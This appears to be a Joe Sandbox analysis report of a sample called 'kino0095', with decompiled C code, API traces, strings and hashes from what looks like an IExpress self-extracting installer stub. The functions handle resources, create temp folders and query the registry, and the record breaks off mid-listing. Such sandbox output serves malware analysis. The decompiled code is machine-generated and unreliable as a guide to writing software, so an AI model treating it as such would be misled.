Part of subcall function 0030468F: LoadResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046CC
Part of subcall function 0030468F: LockResource.KERNEL32(00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046D3
Part of subcall function 0030468F: memcpy_s.MSVCRT ref: 003046E5
Part of subcall function 0030468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003046EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00304FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00305006
LockResource.KERNEL32(00000000), ref: 0030500D
GetDlgItem.USER32(00000000,00000842), ref: 00305030
ShowWindow.USER32(00000000), ref: 00305037
GetDlgItem.USER32(00000841,00000005), ref: 0030504A
ShowWindow.USER32(00000000), ref: 00305051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00305111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00305159

Strings

*MEMCAB, xrefs: 003050C7
CABINET, xrefs: 00304FE6, 00304FF7

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 291d53b9bf05f02bf21cc3011aa63ecc1c5da202d3fcdeb72c2dfc7b9ad89116
Instruction ID: 669a82b7ca7c2414df09ae13e77ea63e86ca20b1f490938b6c231f23cfc7b724
Opcode Fuzzy Hash: 291d53b9bf05f02bf21cc3011aa63ecc1c5da202d3fcdeb72c2dfc7b9ad89116
Instruction Fuzzy Hash: CA3109F0743706BBEB275B61BCB9F67369CAB08745F050427FB41A25E2DAB48C008A64

Uniqueness

Uniqueness Score: -1.00%

Function 003044B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E003044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x308004; // 0xcd371c79
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x308a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x309a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00301680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0030171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0030171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0030681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E003067C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0030681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E003067C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00306CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x003044b9
0x003044c4
0x003044cb
0x003044d8
0x003044e4
0x003044eb
0x003044ee
0x003044ef
0x003044ef
0x003044f1
0x003044f7
0x003044f8
0x0030467b
0x003044fe
0x00304509
0x00304518
0x00304525
0x00304562
0x00304568
0x00304568
0x0030456b
0x0030456b
0x0030456d
0x0030456e
0x00304572
0x00304578
0x0030457c
0x003045cb
0x00304607
0x00304607
0x0030460d
0x00304613
0x00304617
0x00000000
0x0030461d
0x00304623
0x00304626
0x00304628
0x00000000
0x00304628
0x003045cd
0x003045cd
0x003045cf
0x003045cf
0x003045d2
0x003045d2
0x003045d4
0x003045d5
0x003045db
0x003045de
0x003045e3
0x003045e9
0x003045ed
0x00000000
0x003045f3
0x003045fd
0x00000000
0x00304602
0x003045ed
0x0030457e
0x0030457e
0x00304580
0x00304580
0x00304583
0x00304583
0x00304585
0x00304586
0x0030458a
0x0030458c
0x0030458f
0x0030458f
0x00304591
0x00304592
0x0030459b
0x0030459e
0x003045a3
0x003045a9
0x003045ad
0x00000000
0x003045af
0x003045af
0x003045bf
0x0030462d
0x00304630
0x0030463d
0x0030464e
0x0030464e
0x0030463f
0x00304640
0x00304647
0x0030464c
0x00000000
0x00000000
0x0030464c
0x00304666
0x0030466d
0x0030466f
0x00304675
0x00304675
0x003045ad
0x00304527
0x0030452e
0x0030453f
0x0030453f
0x00304530
0x00304531
0x00304538
0x0030453d
0x00000000
0x00000000
0x0030453d
0x00304554
0x0030455a
0x0030455a
0x0030455a
0x00304525
0x0030468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554
LocalAlloc.KERNEL32(00000040,00000065), ref: 003045A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 003045E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0030460D
MessageBeep.USER32(00000000), ref: 00304630
MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00304666
LocalFree.KERNEL32(00000000), ref: 0030466F

Part of subcall function 0030681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0030686E
Part of subcall function 0030681F: GetSystemMetrics.USER32(0000004A), ref: 003068A7
Part of subcall function 0030681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003068CC
Part of subcall function 0030681F: RegQueryValueExA.ADVAPI32(?,00301140,00000000,?,?,0000000C), ref: 003068F4
Part of subcall function 0030681F: RegCloseKey.ADVAPI32(?), ref: 00306902

Strings

doza2, xrefs: 00304545, 0030465A
LoadString() Error. Could not load string resource., xrefs: 003044E4

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$doza2
API String ID: 3244514340-3130468218
Opcode ID: 2ce5d6b190751d032cd1af1bb1b914d0f7b72277421a0c04cb96ae3726a62150
Instruction ID: ba6d7d9d3a06fb5eaf8741280a1aac6aa958dc26964252138a076afc4d6a5eb3
Opcode Fuzzy Hash: 2ce5d6b190751d032cd1af1bb1b914d0f7b72277421a0c04cb96ae3726a62150
Instruction Fuzzy Hash: 735119B19022199FDB239F28DC68BAA7B6CEF46300F014195FE49B7281DB32DE05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003053A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E003053A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x308004; // 0xcd371c79
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0030171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00301680(_t32, 0x104, _t20);
					E0030658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00306CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x308a20 = 1;
				goto L5;
			}

0x003053ac
0x003053b3
0x003053b9
0x003053bb
0x003053bd
0x003053bf
0x003053d1
0x003053d6
0x003053e0
0x003053e2
0x003053f5
0x003053fb
0x00305402
0x0030540b
0x00000000
0x00000000
0x00305413
0x00000000
0x00000000
0x00305415
0x00305416
0x00305427
0x0030542a
0x0030542b
0x00305434
0x00305434
0x0030543a
0x0030544c
0x0030544c
0x00305452
0x0030545a
0x00000000
0x00000000
0x0030545e
0x0030545f
0x00000000

APIs

Part of subcall function 0030171E: _vsnprintf.MSVCRT ref: 00301750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003053FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00305402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0030541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0030542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00305434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00305452

Strings

IXP, xrefs: 00305419
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003053B7, 003053E1, 0030541E
IXP%03d.TMP, xrefs: 003053C0

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-957705000
Opcode ID: d36df910d50e5eda94e09f8522ca248e05308aa5775972f843b0e03ccb3ad3f5
Instruction ID: 898c691ca721ceee554e228341638295e1c49ab30dba20b73ace92d87448dcdd
Opcode Fuzzy Hash: d36df910d50e5eda94e09f8522ca248e05308aa5775972f843b0e03ccb3ad3f5
Instruction Fuzzy Hash: 65112771703A0867E3229B36AC69FEF366DEFC1711F000166F646D21D0CE7489468AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00305467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00305467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x308004; // 0xcd371c79
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x3091e4;
					_t42 = 0x104;
					E00301680(0x3091e4, 0x104);
					L14:
					_t13 = E003058C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x309124 = 0;
							_t14 = 1;
							L24:
							return E00306CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0030597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x308a20; // 0x0
						if(_t61 != 0) {
							 *0x308a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x309124 = E00306285();
						goto L22;
					}
					 *0x308a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E003053A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x3091e4;
				E00301781(0x3091e4, 0x104, __ecx,  &_v268);
				if(( *0x309a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0030658A(_t48, 0x104, 0x301140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0030658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00305472
0x00305479
0x00305481
0x00305484
0x0030551c
0x00305521
0x00305528
0x0030552d
0x0030552f
0x00305539
0x0030554d
0x0030554d
0x00305552
0x00305585
0x00305585
0x0030558b
0x0030558d
0x0030559d
0x0030559d
0x00305557
0x0030555e
0x00000000
0x00000000
0x00305560
0x00305566
0x00305569
0x0030556f
0x0030556f
0x00305581
0x00305581
0x00000000
0x00305581
0x00305545
0x0030557c
0x00000000
0x0030557c
0x00305547
0x00000000
0x00305547
0x0030548a
0x00305490
0x00305497
0x00000000
0x00000000
0x0030549d
0x003054ab
0x003054b4
0x003054c0
0x0030550c
0x00305511
0x00305515
0x00000000
0x00305515
0x003054c9
0x003054d6
0x003054d8
0x003054fe
0x00305503
0x00305507
0x00000000
0x00305507
0x003054da
0x003054dd
0x003054f7
0x00000000
0x003054f7
0x003054df
0x003054e2
0x003054f0
0x00000000
0x003054f0
0x003054e7
0x00000000
0x00000000
0x003054e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003054C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0030553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0030556F

Part of subcall function 003053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003053FB
Part of subcall function 003053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00305402
Part of subcall function 003053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0030541F
Part of subcall function 003053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0030542B
Part of subcall function 003053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00305434

Strings

alpha, xrefs: 003054F0
mips, xrefs: 003054F7
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 0030547D, 00305481, 003054AB, 0030551C, 0030553C, 00305568
i386, xrefs: 003054FE
ppc, xrefs: 003054E9

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-772166365
Opcode ID: 63d02f6ed5f1fa8e990aa1e70980134bbe33ea2be68f013666dee3aa1f0f1802
Instruction ID: 8ade56661718411f15ef59ae501a625d392bb59866c2cc210c609c48eeeabcb5
Opcode Fuzzy Hash: 63d02f6ed5f1fa8e990aa1e70980134bbe33ea2be68f013666dee3aa1f0f1802
Instruction Fuzzy Hash: B031E571B03A085BCB179B299C75ABF77AEAB86340F05016BE843D69D1DB708E018E95

Uniqueness

Uniqueness Score: -1.00%

Function 0030256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0030256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E003024E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00302572
0x00302573
0x00302575
0x00302578
0x0030257d
0x00302627
0x00302583
0x00302586
0x00302589
0x003025eb
0x00302607
0x00000000
0x00302609
0x0030261a
0x00000000
0x0030261a
0x00000000
0x0030258b
0x0030258b
0x0030259e
0x003025b2
0x003025ba
0x003025cb
0x003025d1
0x003025d6
0x003025da
0x003025dd
0x003025dd
0x003025e3
0x003025e3
0x003025e3
0x0030258b
0x00302589
0x0030262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00304096,00304096,?,00301ED3,00000001,00000000,?,?,00304137,?), ref: 003025B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00304096,?,00301ED3,00000001,00000000,?,?,00304137,?,00304096), ref: 003025CB
RegCloseKey.KERNELBASE(?,?,00301ED3,00000001,00000000,?,?,00304137,?,00304096), ref: 003025DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00304096,00304096,?,00301ED3,00000001,00000000,?,?,00304137,?), ref: 003025FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00304096,00000000,00000000,00000000,00000000,?,00301ED3,00000001,00000000), ref: 0030261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 003025A8
PendingFileRenameOperations, xrefs: 003025C3
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003025F5

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 0cb5e81aad229910a9bc17f119d1b2d3ccf0c5d2e040e912ef1b578c4da6d8c5
Instruction ID: 1c0c6ab385093d88d24b1353eaa2e2a537602f539728a4492ccbd748845646bb
Opcode Fuzzy Hash: 0cb5e81aad229910a9bc17f119d1b2d3ccf0c5d2e040e912ef1b578c4da6d8c5
Instruction Fuzzy Hash: D4114F3594322CBBDF229B929C2DDFBBE7CEF057A1F104156F808A2090D6715E48E7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00306A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00307155();
				_push(0x58);
				_push(0x3072b8);
				E00307208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x3088b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x3088b0; // 0x2
						if(__eflags != 0) {
							 *0x3081e4 = _t58;
							goto L13;
						} else {
							 *0x3088b0 = _t58;
							_t37 = E00306C3F(0x3010b8, 0x3010c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00306FF4();
						L13:
						_t68 =  *0x3088b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x3010b4);
							_push(0x3010ac);
							L00307202();
							 *0x3088b0 = 2;
						}
						if(_t53 == 0) {
							 *0x3088ac = 0;
						}
						_t71 =  *0x3088b4;
						if( *0x3088b4 != 0 && E00307060(_t71, 0x3088b4) != 0) {
							_t60 =  *0x3088b4; // 0x0
							 *0x30a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76235b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00302BFB(0x300000, 0, _t59); // executed
							 *0x3081e0 = _t30;
							__eflags =  *0x3081f8;
							if( *0x3081f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x3081e4;
							if( *0x3081e4 == 0) {
								__imp___cexit();
								_t30 =  *0x3081e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0030724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00306a60
0x00306a6a
0x00306a6c
0x00306a71
0x00306a78
0x00306a7f
0x00306a85
0x00306a8e
0x00306a91
0x00306a93
0x00306a9c
0x00306aa2
0x00000000
0x00000000
0x00306aa6
0x00306ab4
0x00000000
0x00306aa8
0x00306aaa
0x00306aab
0x00306aab
0x00306abf
0x00306abf
0x00306ac5
0x00306ad1
0x00306ad7
0x00306b05
0x00000000
